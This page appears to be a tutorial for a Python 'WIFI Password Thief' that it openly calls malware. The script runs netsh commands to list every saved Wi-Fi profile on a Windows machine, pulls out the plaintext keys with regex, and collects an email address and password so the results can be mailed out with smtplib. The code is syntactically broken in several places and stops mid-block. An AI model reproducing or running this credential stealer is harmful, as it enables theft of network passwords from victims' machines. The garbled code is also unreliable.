Malware - WIFI Password Thief


This script steals all relevant WIFI passwords from a given Windows system.

  • This can be coupled with the smtplib to send a report via email too.
  • We use various netsh commands to view the WIFI details,passwords.

    netsh wlan show profile - view ssid , common details.

    netsh wlan show profile "network_name" key=clear - view password along with more info.

  • We use regex to capture the relevant fields by seperating them into groups.


#!/usr/bin/env python

import subprocess, re, argparse

def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument("-e", "--email", dest="email", help="Email-ID to recieve report")
    parser.add_argument("-p", "--password", dest="password", help="Password for provided Email-ID")
    options = parser.parse_args()
    if not
        # code to handle error
        parser.error("\n[-] Please specify a valid Email-ID,  use --help for info.")
    if not options.password:
        # code to handle error
        parser.error("\n[-] Please specify a valid Password,  use --help for info.")
    return options

                                                WIFI Password-Thief

options = get_arguments()

command = 'netsh wlan show profile'
networks = subprocess.check_output(command, shell=True).decode()
# Seperate regex into capturing groups
# \s - spaces; * - any no of; . - any type of char
# Set "Profile" as non capturing group using '?:'
# Use re.findall() to find all instances as lists that match instead of
network_names_list = re.findall("(?:Profile\s*:\s)(.*)", networks)
print("[!] Finding Network Names..")

result = ""
pass_result = ""
for network_name in network_names_list:
    command = "netsh wlan show profile " + network_name + " key=clear"
    current_result = subprocess.check_output(command, shell=True).decode()
    result += current_result
print("[!] Finding Network Passwords..")

banner = "\n\nWIFI SSID And PassList:\n"
loop_result = ""
counter = 0
passlist = re.findall("(?:Key Content\s*:\s)(.*)", result)
network_name = re.findall("(?:SSID name\s*:\s\")(.*)(?:\")", result)
    while True:
        net_name = network_name[counter] + ": "
        pass_name = passlist[counter]
        loop_result = net_name + pass_name
        counter += 1
except IndexError:

